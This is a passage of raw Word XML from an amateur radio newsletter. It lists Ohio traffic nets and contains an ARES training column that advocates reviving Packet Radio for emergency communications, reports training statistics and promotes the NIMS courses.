          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>Burning River Traffic Net serving Cleveland and North Central Ohio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4612ED" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>COTN</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>Central Ohio Traffic Net serving Columbus and Central Ohio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61510408" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>MVTN</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>Miami Valley Traffic Net serving the Dayton area</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C14A382" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">NWOH ARES </w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>Northwest Ohio ARES Net serving Toledo and surrounding counties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED1B50D" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>TATN</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>Tri-State Amateur Traffic Net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1B9342" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>TCTTN</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>Tri-County Traffic and Training Net serving North East Ohio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5CDEAB" w14:textId="77777777" w:rsidR="00F53161" w:rsidRDefault="00F53161" w:rsidP="001522E1">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14F26D80" w14:textId="75733032" w:rsidR="003D4474" w:rsidRDefault="006C2B30" w:rsidP="00FD0EAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>_____________________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D114CD" w14:textId="77777777" w:rsidR="00E47AFB" w:rsidRDefault="00E47AFB" w:rsidP="00E47AFB"/>
    <w:p w14:paraId="6017D603" w14:textId="4C5B1523" w:rsidR="00E47AFB" w:rsidRDefault="00E47AFB" w:rsidP="00E47AFB"/>
    <w:p w14:paraId="5D46CFF5" w14:textId="00A4C798" w:rsidR="00A42191" w:rsidRDefault="00A42191" w:rsidP="00E47AFB"/>
    <w:p w14:paraId="4779DC6B" w14:textId="77777777" w:rsidR="00A42191" w:rsidRPr="00FD0EAD" w:rsidRDefault="00A42191" w:rsidP="00A42191">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="training"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidRPr="00FD0EAD">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:i/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252912640" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="357A7FEE" wp14:editId="378A8D87">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>4248150</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>52070</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2541905" cy="2097405"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21384"/>
                <wp:lineTo x="21368" y="21384"/>
                <wp:lineTo x="21368" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="56" name="Picture 56" descr="https://3.bp.blogspot.com/-Eveu-8X9f0w/Ut0MkVkKqzI/AAAAAAAAAKc/VD3GHxhphjMDM4ZFDj1_N12mc9cZ3L0GQCPcBGAYYCw/s320/w8erw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3.bp.blogspot.com/-Eveu-8X9f0w/Ut0MkVkKqzI/AAAAAAAAAKc/VD3GHxhphjMDM4ZFDj1_N12mc9cZ3L0GQCPcBGAYYCw/s320/w8erw1.jpg">
                      <a:hlinkClick r:id="rId74"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId75">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="19017" t="10929"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2541905" cy="20974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D0EAD">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ARES Training Update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2909CBDD" w14:textId="77777777" w:rsidR="00A42191" w:rsidRPr="00FD0EAD" w:rsidRDefault="00A42191" w:rsidP="00A42191">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD0EAD">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Jim Yoder, W8ERW – ARES Data Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DEB2B3" w14:textId="77777777" w:rsidR="00A42191" w:rsidRPr="00FD0EAD" w:rsidRDefault="0084211F" w:rsidP="00A42191">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId76" w:history="1">
        <w:r w:rsidR="00A42191" w:rsidRPr="00FD0EAD">
          <w:rPr>
            <w:rFonts w:eastAsia="Calibri"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>w8erw@arrl.net</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00A42191" w:rsidRPr="00FD0EAD">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C89C0AD" w14:textId="51ECD428" w:rsidR="00A42191" w:rsidRDefault="00A42191" w:rsidP="00E47AFB"/>
    <w:p w14:paraId="0593F553" w14:textId="18372F1F" w:rsidR="001F5896" w:rsidRDefault="001F5896" w:rsidP="00E47AFB"/>
    <w:p w14:paraId="1817740F" w14:textId="56CC14FA" w:rsidR="001F5896" w:rsidRDefault="001F5896" w:rsidP="00E47AFB"/>
    <w:p w14:paraId="68AB70D3" w14:textId="77777777" w:rsidR="00D415E2" w:rsidRDefault="00D415E2" w:rsidP="00D415E2">
      <w:pPr>
        <w:ind w:left="720" w:right="720"/>
      </w:pPr>
      <w:r>
        <w:t>ARES Training Update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141441AC" w14:textId="77777777" w:rsidR="00D415E2" w:rsidRDefault="00D415E2" w:rsidP="00D415E2">
      <w:pPr>
        <w:ind w:left="720" w:right="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68280FFD" w14:textId="68166D94" w:rsidR="00D415E2" w:rsidRDefault="00D415E2" w:rsidP="00D415E2">
      <w:pPr>
        <w:ind w:left="720" w:right="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I would like to wish everyone a wonderful and warm holiday season.  The continuing pandemic threatens many of our normal festivities again this year and family gatherings may be compromised.  Let’s remember the “Reason for the Season” and take every opportunity to celebrate as best we can.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FA5911" w14:textId="77777777" w:rsidR="00D415E2" w:rsidRDefault="00D415E2" w:rsidP="00D415E2">
      <w:pPr>
        <w:ind w:left="720" w:right="720"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1637BA32" w14:textId="77777777" w:rsidR="00D415E2" w:rsidRDefault="00D415E2" w:rsidP="00D415E2">
      <w:pPr>
        <w:ind w:left="720" w:right="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The internet has greatly changed the landscape of our society and it has had a huge impact all over the realm of communications including Amateur Radio.  Some 30 years ago when I first obtained my Novice and then Technician class license, I soon discovered Hams were using the internet protocol also.  I got quite excited as my interest in computers was quite strong and this was an opportunity to blend computers and radio technology together.  I soon found out how useful and appropriate Packet Radio could be.  This of course was before the Internet became readily available.  Initially offered as a dial up connection, the Internet was destined to be the huge platform that it has become.  What can’t you do now on the Internet?  Perhaps it could be said too much as we have become addicted to it and spend a disproportionate amount of time cruising the ether on high speed connections over fiber, cable and wireless connections. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EEBB8B" w14:textId="77777777" w:rsidR="00D415E2" w:rsidRDefault="00D415E2" w:rsidP="00D415E2">
      <w:pPr>
        <w:ind w:left="720" w:right="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B9DCA37" w14:textId="77777777" w:rsidR="00D415E2" w:rsidRDefault="00D415E2" w:rsidP="00D415E2">
      <w:pPr>
        <w:ind w:left="720" w:right="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">So where am I going with this?  It’s been a significant disappointment to me that Packet Radio has been decimated by the growth and ubiquitous adoption of the Internet.  In the heyday of Packet, there were Packet nodes all over the country with both local VHF/UHF radio stations connecting and hopping over these nodes to provide direct keyboard connections, chat functions as well as messaging boards.  That’s all pretty much gone away.  It’s a shame in that we as Amateurs have a block of dedicated IP addresses at our disposal and since Packet Radio is IP based with the error free quality that makes it especially useful and reliable.  Packet Radio can operate entirely RF and thus the possibilities are very suitable for emergency communications.  Yet we have nearly abandoned the technology.  Yes it does still exist and a few continue to realize the continuing utility of the medium.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F639098" w14:textId="77777777" w:rsidR="00D415E2" w:rsidRDefault="00D415E2" w:rsidP="00D415E2">
      <w:pPr>
        <w:ind w:left="720" w:right="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29AF17A6" w14:textId="77777777" w:rsidR="00D415E2" w:rsidRDefault="00D415E2" w:rsidP="00D415E2">
      <w:pPr>
        <w:ind w:left="720" w:right="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I’d like to see a revival and the utilization of Packet Radio regain its place in our ARES bag of tricks.  Packet is ideal for messaging and can be effectively used to transfer files.  It is also somewhat secure as monitoring requires the appropriate Amateur hardware and equipment.  Networks can be established quickly to handle the desired connections between remote locations and a central control point.  Portability and ease of setup including mobile operation can be implemented quickly.  APRS is also a valuable function that can enhance the utility of a mobile station reporting in real time the conditions and damage seen in the field.  The AREDN Mesh network can also be coupled with Packet Radio to provide even further connectivity and utility during a disaster situation.  Both provide automatic station identification and unattended node operation.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2AFBAB" w14:textId="77777777" w:rsidR="00D415E2" w:rsidRDefault="00D415E2" w:rsidP="00D415E2">
      <w:pPr>
        <w:ind w:left="720" w:right="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3505AA16" w14:textId="77777777" w:rsidR="00D415E2" w:rsidRDefault="00D415E2" w:rsidP="00D415E2">
      <w:pPr>
        <w:ind w:left="720" w:right="720"/>
      </w:pPr>
      <w:r>
        <w:t>So there you have it, my editorial on Packet Radio.  Should we not be utilizing this very reliable technology more often in our ARES programs?  I welcome your thoughts and suggestions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355AD51A" w14:textId="77777777" w:rsidR="00D415E2" w:rsidRDefault="00D415E2" w:rsidP="00D415E2">
      <w:pPr>
        <w:ind w:left="720" w:right="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78AE0861" w14:textId="77777777" w:rsidR="00D415E2" w:rsidRDefault="00D415E2" w:rsidP="00D415E2">
      <w:pPr>
        <w:ind w:left="720" w:right="720"/>
      </w:pPr>
      <w:r>
        <w:t>If you have not done so, please have a look at this week’s edition of Postscript where you will find an excellent article by Ted Jacobson W8KVK on the Multi-State Packet Radio Exercise, 2021 Skywarn Recognition Day.  This is an excellent piece detailing the utility of Packet Radio in a very real situation where it can be extremely useful.  Thank you Ted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47846B72" w14:textId="77777777" w:rsidR="00D415E2" w:rsidRDefault="00D415E2" w:rsidP="00D415E2">
      <w:pPr>
        <w:ind w:left="720" w:right="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1AD825" w14:textId="77777777" w:rsidR="00D415E2" w:rsidRDefault="00D415E2" w:rsidP="00D415E2">
      <w:pPr>
        <w:ind w:left="720" w:right="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I am happy again this month to report our continued ARES training success.   This end of year has been different from previous years in that I am seeing regular although somewhat slower certificate submissions.  In years past it has trickled to near nothing around the holidays.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E2D437" w14:textId="77777777" w:rsidR="00D415E2" w:rsidRDefault="00D415E2" w:rsidP="00D415E2">
      <w:pPr>
        <w:ind w:left="720" w:right="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F41479" w14:textId="77777777" w:rsidR="00D415E2" w:rsidRDefault="00D415E2" w:rsidP="00D415E2">
      <w:pPr>
        <w:ind w:left="720" w:right="720"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Currently we have 1,933 ARES members listed in the training database with 891 at Level 1, 742 Level 2 and 211 Level 3.   Total certificates submitted are 10,115 with 213 so far this year.  69 have obtained the Professional Development Series certificate while 74 have received the Aux Com designation certificate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC265A3" w14:textId="77777777" w:rsidR="00D415E2" w:rsidRDefault="00D415E2" w:rsidP="00D415E2">
      <w:pPr>
        <w:ind w:left="720" w:right="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08C1E57A" w14:textId="77777777" w:rsidR="00D415E2" w:rsidRDefault="00D415E2" w:rsidP="00D415E2">
      <w:pPr>
        <w:ind w:left="720" w:right="720"/>
      </w:pPr>
      <w:r>
        <w:t>Congratulations to all of you who have embraced ARES training and I urge everyone to have a look at the 4 NIMS courses online if you have not done so.  Each one can be completed in less than two hours and with a little effort all can be completed in a day.  These 4 courses are the core of the National Incident Management System that virtually all of our first responders utilize daily and many in industry as well.  Completing NIMS will allow you to know what to expect during a disaster response and become a useful participant rather than someone who needs guidance and preparation.  Time is of the essence during a disaster and being prepared with NIMS greatly enhances your usefulness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118D22D5" w14:textId="77777777" w:rsidR="00D415E2" w:rsidRDefault="00D415E2" w:rsidP="00D415E2">
      <w:pPr>
        <w:ind w:left="720" w:right="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7E10FB" w14:textId="77777777" w:rsidR="00D415E2" w:rsidRDefault="00D415E2" w:rsidP="00D415E2">
      <w:pPr>
        <w:ind w:left="720" w:right="720"/>
      </w:pPr>
      <w:r>
        <w:t>NIMS is very well thought out and it is a comprehensive approach to effective disaster management when time and resources become critical.  NIMS is an excellent collaboration of the resources, responders, industry and individual participants resulting in a system that is proven to work.  We as Amateurs are a valued and necessary part of a complete and effective disaster response.  NIMS will make the experience both meaningful and worthy of your time when we are called up to assist our communities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755E5196" w14:textId="77777777" w:rsidR="00D415E2" w:rsidRDefault="00D415E2" w:rsidP="00D415E2">
      <w:pPr>
        <w:ind w:left="720" w:right="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E6CD09E" w14:textId="77777777" w:rsidR="00D415E2" w:rsidRDefault="00D415E2" w:rsidP="00D415E2">
      <w:pPr>
        <w:ind w:left="720" w:right="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Before I close this month’s piece, let me say congratulations to John Levo W8KIW from Highland County on his </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>well deserved</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> recent designation as the Phillip J </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>McGan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Memorial Silver Antenna award recipient.   John tirelessly represents the southern part of the Ohio Section in both the monthly Ohio Section Journal and weekly Postscript newsletters.  John continues to be the commensurate ambassador for Amateur radio in our Ohio Section.     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8C113E" w14:textId="77777777" w:rsidR="00D415E2" w:rsidRDefault="00D415E2" w:rsidP="00D415E2">
      <w:pPr>
        <w:ind w:left="720" w:right="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7E5B2D" w14:textId="77777777" w:rsidR="00D415E2" w:rsidRDefault="00D415E2" w:rsidP="00D415E2">
      <w:pPr>
        <w:ind w:left="720" w:right="720"/>
      </w:pPr>
      <w:r>
        <w:t>So, Merry Christmas and a Happy New Year are my wish for everyone.  Thank you as well for a wonderful and productive year for the Ohio Section.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697CBDAA" w14:textId="77777777" w:rsidR="00D415E2" w:rsidRDefault="00D415E2" w:rsidP="00D415E2">
      <w:pPr>
        <w:ind w:left="720" w:right="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71850762" w14:textId="77777777" w:rsidR="00D415E2" w:rsidRDefault="00D415E2" w:rsidP="00D415E2">
      <w:pPr>
        <w:ind w:left="720" w:right="720"/>
      </w:pPr>
      <w:r>
        <w:t>Thank you and 73,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177938A2" w14:textId="77777777" w:rsidR="00D415E2" w:rsidRDefault="00D415E2" w:rsidP="00D415E2">
      <w:pPr>
        <w:ind w:left="720" w:right="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207E6669" w14:textId="77777777" w:rsidR="00D415E2" w:rsidRDefault="00D415E2" w:rsidP="00D415E2">
      <w:pPr>
        <w:ind w:left="720" w:right="720"/>
      </w:pPr>
      <w:r>
        <w:t>Jim W8ERW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C11C773" w14:textId="77777777" w:rsidR="00A93726" w:rsidRDefault="00A93726" w:rsidP="00196DD0"/>
    <w:p w14:paraId="1DDFACC8" w14:textId="77777777" w:rsidR="00A93726" w:rsidRDefault="00A93726" w:rsidP="00196DD0"/>
    <w:p w14:paraId="3BDC5932" w14:textId="77777777" w:rsidR="00A93726" w:rsidRDefault="00A93726" w:rsidP="00196DD0"/>
    <w:p w14:paraId="078EBB33" w14:textId="77777777" w:rsidR="00A93726" w:rsidRDefault="00A93726" w:rsidP="00196DD0"/>
    <w:p w14:paraId="4AAC4284" w14:textId="77777777" w:rsidR="00A93726" w:rsidRDefault="00A93726" w:rsidP="00196DD0"/>
    <w:p w14:paraId="206D1987" w14:textId="09B0474E" w:rsidR="00CC6DFC" w:rsidRPr="001A71D0" w:rsidRDefault="001A71D0" w:rsidP="00196DD0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A71D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>_________________________________________________________________</w:t>
      </w:r>
      <w:r w:rsidR="00B3771A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021E5044" w14:textId="77777777" w:rsidR="00CC6DFC" w:rsidRDefault="00CC6DFC" w:rsidP="00196DD0"/>
    <w:p w14:paraId="2CE5F892" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Hlk535656017"/>
      <w:bookmarkStart w:id="20" w:name="syc"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">From the Section Youth Coordinator </w:t>
      </w:r>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="19050" distB="19050" distL="19050" distR="19050" simplePos="0" relativeHeight="252990464" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="5A85CAFB" wp14:editId="59C8F1D3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3800340</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>19050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3057660" cy="2271713"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides" distT="19050" distB="19050" distL="19050" distR="19050"/>
            <wp:docPr id="65" name="image13.png" descr="A person sitting at a table with a computer and headphones&#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65" name="image13.png" descr="A person sitting at a table with a computer and headphones&#10;&#10;Description automatically generated with medium confidence"/>
